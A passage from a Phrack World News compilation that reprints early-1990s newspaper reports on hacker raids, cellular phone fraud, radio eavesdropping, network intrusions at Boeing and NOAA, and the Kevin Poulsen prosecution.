  4952. There were too many people congregating."
  4953.  
  4954. [NOTE: Newsbytes stands by its accurate reporting of Johnson's statements.  It
  4955. also affirms that the story by Meeks accurately reflects the material taped
  4956. during his interview]
  4957.  
  4958. In a related matter, Marc Rotenberg, director of the Washington office of
  4959. Computer Professionals For Social Responsibility (CPSR) has announced that CPSR
  4960. has filed a Freedom of Information Act (FOIA) request with the Secret Service
  4961. asking for information concerning Secret Service involvement in the incident.
  4962.  
  4963. Rotenberg told Newsbytes that the Secret Service has 10 days to respond to the
  4964. request.  He also said that CPSR "is exploring other legal options in this
  4965. matter."
  4966.  
  4967. The Secret Service, in earlier conversations with Newsbytes, has denied that
  4968. the mall security was working on its behalf.
  4969.  
  4970. In the incident itself, a group attending the informal meeting was disbanded
  4971. and, according to attendees, had property confiscated.  They also contend that
  4972. security guards took film from someone photographing the confiscation as well
  4973. as a list that someone was making of the guard's names.  In his November 9th
  4974. conversation with Newsbytes, Johnson denied that security personnel took away
  4975. any film or lists and further said "We did not confiscate any material.  The
  4976. group refused to own up to who owned material on the tables and in the vicinity
  4977. so we collected it as lost material.  If it turns out that anything did belong
  4978. to any of those people, they are welcome to come in and, after making proper
  4979. identification, take the material."
  4980.  
  4981. 2600 meetings are promoted by 2600 Magazine: The Hacker Quarterly and are held
  4982. on the evening of the first Friday of each month in public places and malls in
  4983. New York City, Washington, Philadelphia, Cambridge, St. Louis, Chicago, Los
  4984. Angeles and San Francisco.  They are regularly attended by a variety of persons
  4985. interested in telecommunications and so-called "hacker issues".
  4986. _______________________________________________________________________________
  4987.  
  4988.  Secret Service Grabs Computers In College Raid               December 17, 1992
  4989.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4990.  by Joe Abernathy (The Houston Chronicle)(Page A37)
  4991.  
  4992. The Secret Service has raided a dorm room at Texas Tech University, seizing the
  4993. computers of two Houston-area students who allegedly used an international
  4994. computer network to steal computer software.
  4995.  
  4996. Agents refused to release the names of the two area men and a third man, a
  4997. former Tech student from Austin, who were not arrested in the late-morning raid
  4998. Monday at the university in Lubbock.  Their cases will be presented to a grand
  4999. jury in January.
  5000.  
  5001. The three, in their early 20s, are expected to be charged with computer crime,
  5002. interstate transport of stolen property and copyright infringements.
  5003.  
  5004. "The university detected it," said Agent R. David Freriks of the Secret Service
  5005. office in Dallas, which handled the case.  He said Texas Tech computer system
  5006. operators noticed personal credit information mixed in with the software
  5007. mysteriously filling up their data storage devices.
  5008.  
  5009. The former student admitted pirating at least $6,000 worth of games and
  5010. programs this summer, Freriks said.
  5011.  
  5012. The raid is the first to fall under a much broader felony definition of
  5013. computer software piracy that could affect many Americans.
  5014.  
  5015. Agents allege the three used the Internet computer network, which connects up
  5016. to 15 million people in more than 40 nations, to make contacts with whom they
  5017. could trade pirated software.  The software was transferred over the network,
  5018. into Texas Tech's computers and eventually into their personal computers.
  5019.  
  5020. The Software Publishers Association, a software industry group chartered to
  5021. fight piracy, contends the industry lost $1.2 billion in sales in 1991 to
  5022. pirates.
  5023.  
  5024. Although these figures are widely questioned for their accuracy, piracy is
  5025. widespread among Houston's 450-plus computer bulletin boards, and even more so
  5026. on the global Internet.
  5027.  
  5028. "There are a lot of underground sites on the Internet run by university system
  5029. administrators, and they have tons of pirated software available to download --
  5030. gigabytes of software," said Scott Chasin, a former computer hacker who is now
  5031. a computer security consultant.
  5032.  
  5033. Freriks said the investigation falls under a revision of the copyright laws
  5034. that allows felony charges to be brought against anyone who trades more than 10
  5035. pieces of copyrighted software -- a threshold that would cover many millions of
  5036. Americans who may trade copies of computer programs with their friends.
  5037.  
  5038. "The ink is barely dry on the amendment, and you've already got law enforcement
  5039. in there, guns blazing, because somebody's got a dozen copies of stolen
  5040. software," said Marc Rotenberg, director of Computer Professionals for Social
  5041. Responsibility, in Washington.
  5042.  
  5043. "That was a bad provision when it was passed, and was considered bad for
  5044. precisely this reason, giving a justification for over-reaching by law
  5045. enforcement."
  5046.  
  5047. Freriks said the raid also involved one of the first uses of an expanded right
  5048. to confiscate  computers  used in crime.
  5049.  
  5050. "Our biggest complaint has been that you catch 'em and slap 'em on the wrist,
  5051. and then give the smoking gun back," he said.
  5052.  
  5053. "So they've changed the law so that we now have forfeiture authority."
  5054.  
  5055. The Secret Service already has been under fire for what is seen by civil
  5056. libertarians as an overly casual use of such authority, which many believe has
  5057. mutated from an investigative tool into a de facto punishment without adequate
  5058. court supervision.
  5059.  
  5060. _______________________________________________________________________________
  5061.  
  5062.  Hacker Taps Into Freeway Call Box -- 11,733 Times             October 23, 1992
  5063.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5064.  by Jeffrey A. Perlman (Los Angeles Times)(Page A3)
  5065.  
  5066. SANTA ANA, CA -- An enterprising hacker reached out and touched someone 11,733
  5067. times in August -- from a freeway emergency call box in Orange County.
  5068.  
  5069. A computer that monitors the county's emergency call boxes attributed 25,875
  5070. minutes of calls to the mysterious caller who telephoned people in countries
  5071. across the globe, according to a staff report prepared for the Orange County
  5072. Transportation Authority.
  5073.  
  5074. "This is well over the average of roughly 10 calls per call box," the report
  5075. noted.
  5076.  
  5077. About 1,150 bright yellow call boxes have been placed along Orange County's
  5078. freeways to connect stranded motorists to the California Highway Patrol.  But
  5079. the caller charged all his calls to a single box on the shoulder of the Orange
  5080. (57) Freeway.
  5081.  
  5082. The hacker apparently matched the individual electronic serial number for the
  5083. call box to its telephone number.  It took an investigation by the transit
  5084. authority, and three cellular communications firms to unravel the mystery, the
  5085. report stated.
  5086.  
  5087. Officials with the transit authority's emergency call box program were not
  5088. available to comment on the cost of the phone calls or to say how they would be
  5089. paid.
  5090.  
  5091. But the report assured that "action has been taken to correct this problem.  It
  5092. should be noted that this is the first incident of this type in the five-year
  5093. history of the program."
  5094.  
  5095. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5096.  
  5097.  Ring May Be Responsible For Freeway Call Box Scam             October 24, 1992
  5098.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5099.  by Jodi Wilgoren (Los Angeles Times)(Page B4)
  5100.  
  5101.             "Officials Believe A Hacker Sold Information to Others;
  5102.                   LA Cellular Will Pay For The Excess Calls."
  5103.  
  5104. COSTA MESA, CA -- As soon as he saw the August bill for Orange County's freeway
  5105. call boxes, analyst Dana McClure guessed something was awry.
  5106.  
  5107. There are typically about 12,000 calls a month from the 1,150 yellow boxes that
  5108. dot the county's freeways.  But in August, there were nearly that many
  5109. registered to a single box on the Orange Freeway a half-mile north of Lambert
  5110. Road in Brea.
  5111.  
  5112. "This one stood out, like 'Whoa!'" said McClure, who analyzes the monthly
  5113. computer billing tapes for the Orange County Transportation Authority.  "It
  5114. kicked out as an error because the number of minutes was so far over what it is
  5115. supposed to be."
  5116.  
  5117. With help from experts at LA Cellular, which provides the telephone service for
  5118. the boxes, and GTE Cellular, which maintains the phones, McClure and OCTA
  5119. officials determined that the calls -- 11,733 of them totaling 25,875 minutes
  5120. for a charge of about $1,600 -- were made because the hacker learned the code
  5121. and telephone number for the call boxes.
  5122.  
  5123. Because of the number of calls in just one month's time, officials believe
  5124. there are many culprits, perhaps a ring of people who bought the numbers from
  5125. the person who cracked the system.
  5126.  
  5127. You'd have to talk day and night for 17 or 18 days to do that; it'd be
  5128. fantastic to be able to make that many calls," said Lee Johnson of GTE
  5129. Cellular.
  5130.  
  5131. As with all cases in which customers prove they did not make the calls on their
  5132. bills, LA Cellular will pick up the tab, company spokeswoman Gail Pomerantz
  5133. said.  Despite the amount of time involved, the bill was only $1,600, according
  5134. to OCTA spokeswoman Elaine Beno, because the county gets a special emergency
  5135. service rate for the call box lines.
  5136.  
  5137. The OCTA will not spend time and money investigating who made the calls;
  5138. however, it has adjusted the system to prevent further fraud.  Jim Goode of LA
  5139. Cellular said such abuses are rare among cellular subscribers, and that such
  5140. have never before been tracked to freeway call boxes.
  5141.  
  5142. The call boxes contain solar cellular phones programmed to dial directly to the
  5143. California Highway Patrol or a to a GTE Cellular maintenance line.  The calls
  5144. on the August bill included 800 numbers and 411 information calls and hundreds
  5145. of calls to financial firms in New York, Chicago and Los Angeles.  That calls
  5146. were placed to these outside lines indicates that the intruders made the
  5147. connections from another cellular phone rather than from the call box itself.
  5148. Each cellular phone is assigned a seven-digit Mobile Identification Number that
  5149. functions like a phone number, and a 10- or 11-digit Electronic Service Number
  5150. unique to that particular phone (similar to the vehicle identification number
  5151. assigned every automobile).  By reprogramming another cellular phone with the
  5152. MIN and ESN of the call box phone, a hacker could charge all sorts of calls to
  5153. the OCTA.
  5154.  
  5155. "That's not legally allowable, and it's not an easy thing to do," McClure said,
  5156. explaining that the numbers are kept secret and that reprogramming a cellular
  5157. phone could wreck it.  "Most people don't know how to do that, but there are
  5158. some."
  5159.  
  5160. Everyone involved with the call box system is confident that the problem has
  5161. been solved, but officials are mum as to how they blocked potential cellular
  5162. banditry.
  5163.  
  5164. "I don't think we can tell you what we did to fix it because we don't want it
  5165. to happen again," Beno said with a laugh.
  5166. _______________________________________________________________________________
  5167.  
  5168.  FBI Probes Possible Boeing Computer Hacker                    November 6, 1992
  5169.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5170.  Taken from Reuters
  5171.  
  5172. SEATTLE -- Federal authorities said Friday they were investigating the
  5173. possibility that a hacker had breached security and invaded a Unix-based
  5174. computer system at the aerospace giant Boeing Co.
  5175.  
  5176. The Federal Bureau of Investigation confirmed the probe after a Seattle radio
  5177. station reported it received a facsimile of a Boeing memorandum warning
  5178. employees the security of one of its computer networks may have been violated.
  5179.  
  5180. The memo, which had been sent from inside Boeing, said passwords may have been
  5181. compromised, a reporter for the KIRO station told Reuters.
  5182.  
  5183. KIRO declined to release a copy of the memorandum or to further identify its
  5184. source.
  5185.  
  5186. The memorandum said the problem involved computers using Unix, the open-ended
  5187. operating system used often in engineering work.
  5188.  
  5189. Sherry Nebel, a spokeswoman at Boeing's corporate headquarters, declined
  5190. comment on the memorandum or the alleged breach of security and referred all
  5191. calls to the FBI.
  5192.  
  5193. An FBI spokesman said the agency was in touch with the company and would
  5194. discuss with it possible breaches of federal law.
  5195.  
  5196. No information was immediately available on what type of computer systems may
  5197. have been violated at Boeing, the world's largest commercial aircraft
  5198. manufacturer.
  5199.  
  5200. The company, in addition, acts as a defense contractor and its business
  5201. includes work on the B-2 stealth bomber, NASA's space station and the "Star
  5202. Wars" project.
  5203.  
  5204. Boeing is a major user of computer technology and runs a computer services
  5205. group valued at $1 billion.
  5206.  
  5207. Much of the company's engineering work is conducted using computer -aided
  5208. design (CAD) capabilities.  Boeing currently is pioneering a computerized
  5209. technique which uses 2,000 computer terminals to design its new 777 twinjet.
  5210.  
  5211. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5212.  
  5213.  FBI Expands Boeing Computer Hacker Probe                      November 9, 1992
  5214.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5215.  by Samuel Perry (Reuters)
  5216.  
  5217. SEATTLE -- Federal authorities expanded their investigation of a computer
  5218. hacker or hackers suspected of having invaded a computer system at aerospace
  5219. giant and defense contractor Boeing Co.
  5220.  
  5221. FBI spokesman Dave Hill said the investigation was expanded after the agency
  5222. discovered similar infiltrations of computer records belonging to the U.S.
  5223. District Court in Seattle and another government agency.
  5224.  
  5225. "We're trying to determine if the same individuals are involved here," he said,
  5226. adding more than one suspect may be involved and the purpose of the intrusion
  5227. was unclear.
  5228.  
  5229. "We don't think this was an espionage case," Hill said, adding federal agents
  5230. were looking into violations of U.S. law barring breaking into a computer of
  5231. federal interest, but that no government classified data was believed to be
  5232. compromised.
  5233.  
  5234. "I'm not sure what their motivation is," he told Reuters.
  5235.  
  5236. The FBI confirmed the investigation after a Seattle radio station reported it
  5237. received a facsimile of a Boeing memorandum warning employees that the security
  5238. of one of its computer networks may have been violated.
  5239.  
  5240. A news reporter at KIRO Radio, which declined to release the facsimile, said
  5241. it was sent by someone within Boeing and that it said many passwords may have
  5242. been compromised.
  5243.  
  5244. Boeing's corporate headquarters has declined to comment on the matter,
  5245. referring all calls to the FBI.
  5246.  
  5247. The huge aerospace company, which is the world's largest maker of commercial
  5248. jetliners, relies heavily on computer processing to design and manufacture its
  5249. products. Its data processing arm operates $1.6 billion of computer equipment.
  5250.  
  5251. No information was disclosed on what system at Boeing had been compromised.
  5252. But one computer industry official said it could include "applications
  5253. involving some competitive situations in the aerospace industry.
  5254.  
  5255. The company is a defense contractor or subcontractor on major U.S. military
  5256. programs, such as the B-2 stealth bomber, the advanced tactical fighter,
  5257. helicopters, the NASA space station and the "Star Wars" missile defense system.
  5258.  
  5259. Recently, Boeing has pioneered the unprecedented use of computer-aided design
  5260. capabilities in engineering its new 777 twinjet. The design of the 777 is now
  5261. mostly complete as Boeing prepares for final assembly beginning next year.
  5262.  
  5263. That system, which uses three-dimensional graphics to replace a draftsman's
  5264. pencil and paper, includes 2,000 terminals that can tap into data from around
  5265. the world.
  5266. _______________________________________________________________________________
  5267.  
  5268.  Hacker Breaches NOAA Net                                        August 3, 1992
  5269.  ~~~~~~~~~~~~~~~~~~~~~~~~
  5270.  by Kevin Power (Government Computer News)(Page 10)
  5271.  
  5272. As a recent breach of the National Oceanic and Atmospheric Administration's
  5273. (NOAA) link to the Internet shows, the network not only benefits scientists but
  5274. also attracts unwanted attention from hackers.
  5275.  
  5276. NOAA officials said an intruder in May accessed the agency's TCP/IP network,
  5277. seeking to obtain access to the Internet.  The breach occurred on the National
  5278. Weather Service headquarters' dial-in communications server in Silver Spring,
  5279. Maryland, said Harold Whitt, a senior telecommunications engineer with NOAA.
  5280.  
  5281. Cygnus Support, a Palo Alto, California, software company, alerted NOAA
  5282. officials to the local area network security breach when Cygnus found that an
  5283. outsider had accessed one of its servers from the NOAA modem pool and had
  5284. attempted several  long-distance phone calls.
  5285.  
  5286. NOAA and Cygnus officials concluded that the perpetrator was searching for an
  5287. Internet host, possibly to locate a games publisher, Whitt said.  Fortunately,
  5288. the hacker did no damage to NOAA's data files, he said.
  5289.  
  5290. Whitt said intruders using a modem pool to tap into external networks are
  5291. always a security concern.  But organizations with Internet access seem to be
  5292. hacker favorites, he said.  "There's a lot of need for Internet security,"
  5293. Whitt said.
  5294.  
  5295. "You have to make sure you monitor the usage of the TCP/IP network and the
  5296. administration of the local host.  It's a common problem, but in our case we're
  5297. more vulnerable because of tremendous Internet access," Whitt said.
  5298.  
  5299. Whitt said NOAA's first response was to terminate all dial-in services
  5300. temporarily and change all the numbers.
  5301.  
  5302. Whitt said he also considered installing a caller-identification device for the
  5303. new lines.  But the phone companies have limited capabilities to investigate
  5304. random incidents, he said.
  5305.  
  5306. "It's very difficult to isolate problems at the protocol level," Whitt said.
  5307. "We targeted the calls geographically to the Midwest.
  5308.  
  5309. "But once you get into the Internet and have an understanding of TCP/IP, you
  5310. can just about go anywhere," Whitt said.
  5311.  
  5312. NOAA, a Commerce Department agency, has since instituted stronger password
  5313. controls and installed a commercial dial-back security system, Defender from
  5314. Digital Pathways Inc. of Mountain View, California.
  5315.  
  5316. Whitt said the new system requires users to undergo password validation at dial
  5317. time and calls back users to synchronize modems and log calls.  Despite these
  5318. corrective measures, Reed Phillips, Commerce's IRM director, said the NOAA
  5319. incident underlies the axiom that networks always should be considered
  5320. insecure.
  5321.  
  5322. At the recent annual conference of the Federation of Government Information
  5323. Processing Councils in New Orleans, Phillips said the government is struggling
  5324. to transmit more information electronically and still maintain control over the
  5325. data.
  5326.  
  5327. Phillips said agencies are plagued by user complacency, a lack of
  5328. organizational control, viruses, LAN failures and increasing demands for
  5329. electronic commerce. "I'm amazed that there are managers who believe their
  5330. electronic-mail systems are secure," Phillps said.  "We provide a great deal of
  5331. security, but it can be interrupted.
  5332.  
  5333. "Security always gets hits hard in the budget.  But the good news is vendors
  5334. recognize our needs and are coming out with cheaper security tools," Phillips
  5335. said.
  5336.  
  5337. Phillips said the NOAA attack shows that agencies must safeguard a network's
  5338. physical points because LANs present more security problems than centralized
  5339. systems.
  5340.  
  5341. "The perpetrator can dial in via a modem using the common services provided by
  5342. the telephone company, and the perpetrator risks no personal physical harm.  By
  5343. gaining access to a single system on the network the perpetrator is then able
  5344. to propagate his access rights to multiple systems on the network," Phillips
  5345. said.
  5346.  
  5347. "In many LAN environments a user need only log on the network once and all
  5348. subsequent access is assumed to be authorized for the entire LAN.  It then
  5349. becomes virtually impossible for a network manager or security manager to track
  5350. events of a perpetrator," he said.
  5351. _______________________________________________________________________________
  5352.  
  5353.  Hackers Scan Airwaves For Conversations                        August 17, 1992
  5354.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5355.  by Mark Lewyn (The Washington Post)(Page A1)
  5356.  
  5357.                     "Eavesdroppers Tap Into Private Calls."
  5358.  
  5359. On the first day of the Soviet coup against Mikhail Gorbachev in August 1991,
  5360. Vice President Quayle placed a call to Senator John C. Danforth (R-Mo.) and
  5361. assessed the tense, unfolding drama.
  5362.  
  5363. It turned out not to be a private conversation.
  5364.  
  5365. At the time, Quayle was aboard a government jet, flying to Washington from
  5366. California.  As he passed over Amarillo, Texas his conversation, transmitted
  5367. from the plane to Danforth's phone, was picked up by an eavesdropper using
  5368. electronic "scanning" gear that searches the airwaves for radio or wireless
  5369. telephone transmissions and then locks onto them.
  5370.  
  5371. The conversation contained no state secrets -- the vice president observed that
  5372. Gorbachev was all but irrelevant and Boris Yeltsin had become the man to watch.
  5373. But it remains a prized catch among the many conversations overhead over many
  5374. years by one of a steadily growing fraternity of amateur electronics
  5375. eavesdroppers who listen in on all sorts of over-the-air transmissions, ranging
  5376. from Air Force One communications to cordless car-phone talk.
  5377.  
  5378. One such snoop overheard a March 1990 call placed by Peter Lynch, a well-known
  5379. mutual fund executive in Boston, discussing his forthcoming resignation, an
  5380. event that later startled financial circles.  Another electronic listener
  5381. overheard the chairman of Popeye's Fried Chicken disclose plans for a 1988
  5382. takeover bid for rival Church's Fried Chicken.
  5383.  
  5384. Calls by President Bush and a number of Cabinet officers have been intercepted.
  5385. The recordings of car-phone calls made by Virginia Governor L. Douglas Wilder
  5386. (D), intercepted by a Virginia Beach restaurant owner and shared with Senator
  5387. Charles S. Robb (D-Va.), became a cause ce'le'bre in Virginia politics.
  5388.  
  5389. Any uncoded call that travels via airwaves, rather than wire, can be picked up,
  5390. thus the possibilities have multiplied steadily with the growth of cellular
  5391. phones in cars and cordless phones in homes and offices.  About 41 percent of
  5392. U.S. households have cordless phones and the number is expected to grow by
  5393. nearly 16 million this year, according to the Washington-based Electronics
  5394. Industry Association.
  5395.  
  5396. There are 7.5 million cellular phone subscribers, a technology that passes
  5397. phone calls over the air through a city from one transmission "cell" to the
  5398. next. About 1,500 commercial airliners now have air-to-ground phones -- roughly
  5399. half the U.S. fleet.
  5400.  
  5401. So fast-growing is this new form of electronic hacking that it has its own
  5402. magazines, such as Monitoring Times.  "The bulk of the people doing this aren't
  5403. doing it maliciously," said the magazine's editor, Robert Grove, who said he
  5404. has been questioned several times by federal agents, curious about hackers'
  5405. monitoring activities.
  5406.  
  5407. But some experts fear the potential for mischief.  The threat to business from
  5408. electronic eavesdropping is "substantial," said Thomas S. Birney III, president
  5409. of Cellular Security Group, a Massachusetts-based consulting group.
  5410.  
  5411. Air Force One and other military and government aircraft have secure satellite
  5412. phone links for sensitive conversations with the ground, but because these are
  5413. expensive to use and sometimes not operating, some calls travel over open
  5414. frequencies.  Specific frequencies, such as those used by the president's
  5415. plane, are publicly available and are often listed in "scanners" publications
  5416. and computer bulletin boards.
  5417.  
  5418. Bush, for example, was accidentally overheard by a newspaper reporter in 1990
  5419. while talking about the buildup prior to the Persian Gulf War with Senator
  5420. Robert Byrd (D-W.Va.).  The reporter, from the Daily Times in Gloucester,
  5421. Massachusetts quickly began taking notes and the next day, quoted Bush in his
  5422. story under the headline, "Bush Graces City Airspace."
  5423.  
  5424. The vice president's chief of staff, William Kristol, was overheard castigating
  5425. one staff aide as a "jerk" for trying to reach him at home.
  5426.  
  5427. Some eavesdroppers may be stepping over the legal line, particularly if they
  5428. tape record such conversations.
  5429.  
  5430. The Electronic Communications Privacy Act prohibits intentional monitoring,
  5431. taping or distribution of the content of most electronic, wire or private oral
  5432. communications.  Cellular phone calls are explicitly protected under this act.
  5433. Local laws often also prohibit such activity.  However, some lawyers said that
  5434. under federal law, it is legal to intercept cordless telephone conversations as
  5435. well as conversations on an open radio channel.
  5436.  
  5437. The government rarely prosecutes such cases because such eavesdroppers are
  5438. difficult to catch.  Not only that, it is hard to win convictions against
  5439. "listening Toms," lawyers said, because prosecutors must prove the
  5440. eavesdropping was intentional.
  5441.  
  5442. "Unless they prove intent they are not going to win," said Frank Terranella,
  5443. general counsel for the Association of North American Radio Clubs in Clifton,
  5444. New Jersey.  "It's a very tough prosecution for them."
  5445.  
  5446. To help curb eavesdropping, the House has passed a measure sponsored by Rep.
  5447. Edward J. Markey (D-Mass.), chairman of the House telecommunications and
  5448. finance subcommittee, that would require the Federal Communications Commission
  5449. to outlaw any scanner that could receive cellular frequencies.  The bill has
  5450. been sent to the Senate.
  5451.  
  5452. But there are about 10 million scanners in use, industry experts report, and
  5453. this year sales of scanners and related equipment such as antennas will top
  5454. $100 million.
  5455.  
  5456. Dedicated scanners, who collect the phone calls of high-ranking government
  5457. officials the way kids collect baseball cards, assemble basements full of
  5458. electronic gear.
  5459.  
  5460. In one sense, the electronic eavesdroppers are advanced versions of the
  5461. ambulance chasers who monitor police and fire calls with simpler scanning
  5462. equipment and then race to the scene of blazes and accidents for a close look.
  5463. But they also have kinship with the computer hackers who toil at breaking into
  5464. complex computer systems and rummaging around other's files and software
  5465. programs.
  5466.  
  5467. One New England eavesdropper has four scanners, each one connected to its own
  5468. computer, with a variety of frequencies programmed.  When a conversation
  5469. appears on a pre-selected frequency, a computer automatically locks in on the
  5470. frequency to capture it.  He also keeps a scanner in his car, for entertainment
  5471. along the road.
  5472.  
  5473. He justifies his avocation with a seemingly tortured logic.  "I'm not going out
  5474. and stealing these signals," he said.  "They're coming into my home, right
  5475. through my windows."
  5476. _______________________________________________________________________________
  5477.  
  5478.  Why Cybercrooks Love Cellular                                December 21, 1989
  5479.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5480.  by William G. Flanagan and Brigid McMenamin (Forbes)(Page 189)
  5481.  
  5482. Cellular phones provide cybercrooks with golden opportunities for telephone
  5483. toll fraud, as many shocked cellular customers are discovering.  For example,
  5484. one US West Cellular customer in Albuquerque recently received a hefty
  5485. telephone bill.
  5486.  
  5487. Total: $20,000.
  5488.  
  5489. Customers are not held responsible when their phone numbers are ripped off and
  5490. misused.  But you may be forced to have your cellular phone number changed.
  5491. The cellular carriers are the big losers -- to the tune of an estimated $300
  5492. million per year in unauthorized calls.
  5493.  
  5494. How do the crooks get the numbers?  There are two common methods: cloning and
  5495. tumbling.
  5496.  
  5497. Each cellular phone has two numbers -- a mobile identification number (MIN) and
  5498. an electronic serial number (ESN).  Every time you make a call, the chip
  5499. transmits both numbers to the local switching office for verification and
  5500. billing.
  5501.  
  5502. Cloning involves altering the microchip in another cellular phone so that both
  5503. the MIN and ESN numbers match those stolen from a bona fide customer.  The
  5504. altering can be done with a personal computer. The MIN and ESN numbers are
  5505. either purchased from insiders or plucked from the airwaves with a legal
  5506. device, about the size of a textbook, that can be plugged into a vehicle's
  5507. cigarette lighter receptacle.
  5508.  
  5509. Cellular companies are starting to watch for suspicious calling patterns.  But
  5510. the cloning may not be detected until the customer gets his bill.
  5511.  
  5512. The second method -- tumbling -- also involves using a personal computer to
  5513. alter a microchip in a cellular phone so that its numbers change after every
  5514. phone call.  Tumbling doesn't require any signal plucking.  It takes advantage
  5515. of the fact that cellular companies allow "roaming" -- letting you make calls
  5516. away from your home area.
  5517.  
  5518. When you use a cellular phone far from your home base, it may take too long for
  5519. the local switching office to verify your MIN and ESN numbers.  So the first
  5520. call usually goes through while the verification goes on.  If the numbers are
  5521. invalid, no more calls will be permitted by that office on that phone.
  5522.  
  5523. In 1987 a California hacker figured out how to use his personal computer to
  5524. reprogram the chip in a cellular phone.  Authorities say one of his pals
  5525. started selling altered chips and chipped-up phones.  Other hackers figured out
  5526. how to make the chips generate new, fake ESN numbers every time the cellular
  5527. phone was used, thereby short-circuiting the verification process.  By 1991
  5528. chipped-up, tumbling ESN phones were in use all over the U.S.
  5529.  
  5530. The cellular carriers hope to scotch the problem of tumbling with instant
  5531. verification.  But that won't stop the clones.
  5532.  
  5533. How do crooks cash in?  Drug dealers buy (for up to $ 3,200) or lease (about
  5534. $750 per day) cellular phones with altered chips.  So do the "call-sell"
  5535. crooks, who retail long distance calls to immigrants often for less than phone
  5536. companies charge.  That's why a victim will get bills for calls all over the
  5537. world, but especially to Colombia, Bolivia and other drug-exporting countries.
  5538. _______________________________________________________________________________
  5539.  
  5540.                                 ==Phrack Inc.==
  5541.  
  5542.                   Volume Four, Issue Forty-One, File 12 of 13
  5543.  
  5544.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5545.               PWN                                             PWN
  5546.               PWN              Phrack World News              PWN
  5547.               PWN                                             PWN
  5548.               PWN           Issue 41 / Part 2 of 3            PWN
  5549.               PWN                                             PWN
  5550.               PWN        Compiled by Datastream Cowboy        PWN
  5551.               PWN                                             PWN
  5552.               PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  5553.  
  5554.  
  5555.  Government Cracks Down On Hacker                              November 2, 1992
  5556.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5557.  by Donald Clark (The San Francisco Chronicle)(Page C1)
  5558.  
  5559.          "Civil Libertarians Take Keen Interest In Kevin Poulsen Case"
  5560.  
  5561. Breaking new ground in the war on computer crime, the Justice Department plans
  5562. to accuse Silicon Valley's most notorious hacker of espionage.
  5563.  
  5564. Kevin Lee Poulsen, 27, touched off a 17-month manhunt before being arrested on
  5565. charges of telecommunications and computer fraud in April 1991.  A federal
  5566. grand jury soon will be asked to issue a new indictment charging Poulsen with
  5567. violating a law against willfully sharing classified information with
  5568. unauthorized persons, assistant U.S. attorney Robert Crowe confirmed.
  5569.  
  5570. A 1988 search of Poulsen's Menlo Park storage locker uncovered a set of secret
  5571. orders from a military exercise, plus evidence that Poulsen may have tried to
  5572. log onto an Army data network and eavesdropped on a confidential investigation
  5573. of former Philippine President Ferdinand Marcos.  It is not clear whether the
  5574. new charge stems from these or other acts.
  5575.  
  5576. Poulsen did not hand secrets to a foreign power, a more serious crime, Crowe
  5577. noted.  But by using an espionage statute against a U.S. hacker for the first
  5578. time, prosecutors raise the odds of a record jail sentence that could be used
  5579. to deter other electronic break-ins.
  5580.  
  5581. They could use a stronger deterrent.  Using personal computers connected to
  5582. telephone lines, cadres of so-called cyberpunks have made a sport of tapping
  5583. into confidential databases and voicemail systems at government agencies and
  5584. corporations.  Though there is no reliable way to tally the damage, a 1989
  5585. survey indicated that computer crimes may cost U.S. business $500 million a
  5586. year, according to the Santa Cruz-based National Center for Computer Crime
  5587. Data.
  5588.  
  5589. Telephone companies, whose computers and switching systems have long been among
  5590. hackers' most inviting targets, are among those most anxious to tighten
  5591. security.  Poulsen allegedly roamed at will through the networks of Pacific
  5592. Bell, for example, changing records and even intercepting calls between Pac
  5593. Bell security personnel who were on his trail.
  5594.  
  5595. The San Francisco-based utility has been intimately involved in his
  5596. prosecution; Poulsen was actually captured in part because one of the company's
  5597. investigators staked out a suburban Los Angeles supermarket where the fugitive
  5598. shopped.
  5599.  
  5600. "Virtually everything we do these days is done in a computer --your credit
  5601. cards, your phone bills," said Kurt von Brauch, a Pac Bell security officer who
  5602. tracked Poulsen, in an interview last year. "He had the knowledge to go in
  5603. there and alter them."
  5604.  
  5605.  
  5606. BROAD LEGAL IMPACT
  5607.  
  5608. Poulsen's case could have broad impact because of several controversial legal
  5609. issues involved.  Some civil libertarians, for example, question the Justice
  5610. Department's use of the espionage statute, which carries a maximum 10-year
  5611. penalty and is treated severely under federal sentencing guidelines.  They
  5612. doubt the law matches the actions of Poulsen, who seems to have been motivated
  5613. more by curiosity than any desire to hurt national security.
  5614.  
  5615. "Everything we know about this guy is that he was hacking around systems for
  5616. his own purposes," said Mike Godwin, staff counsel for the Electronic Frontier
  5617. Foundation, a public-interest group that has tracked Poulsen's prosecution.  He
  5618. termed the attempt to use the statute against Poulsen "brain-damaged."
  5619.  
  5620. Poulsen, now in federal prison in Pleasanton, has already served 18 months in
  5621. jail without being tried for a crime, much less convicted.  Though federal
  5622. rules are supposed to ensure a speedy trial, federal judges can grant extended
  5623. time to allow pretrial preparation in cases of complex evidence or novel legal
  5624. issues.
  5625.  
  5626. Both are involved here.  After he fled to Los Angeles to avoid prosecution,
  5627. for example, Poulsen used a special scrambling scheme on one computer to make
  5628. his data files unintelligible to others.  It has taken months to decode that
  5629. data, and the job isn't done yet, Crowe said.  That PC was only found because
  5630. authorities intercepted one of Poulsen's phone conversations from jail, other
  5631. sources said.
  5632.  
  5633.  
  5634. CHARGES LABELED ABSURD
  5635.  
  5636. Poulsen declined requests for interviews.  His attorney, Paul Meltzer, terms
  5637. the espionage charge absurd.  He is also mounting several unusual attacks on
  5638. parts of the government's original indictment against Poulsen, filed in 1989.
  5639.  
  5640. He complains, for example, that the entire defense team is being subjected to
  5641. 15-year background checks to obtain security clearances before key documents
  5642. can be examined.
  5643.  
  5644. "The legal issues are fascinating," Meltzer said. "The court will be forced to
  5645. make law."
  5646.  
  5647. Poulsen's enthusiasm for exploring forbidden computer systems became known to
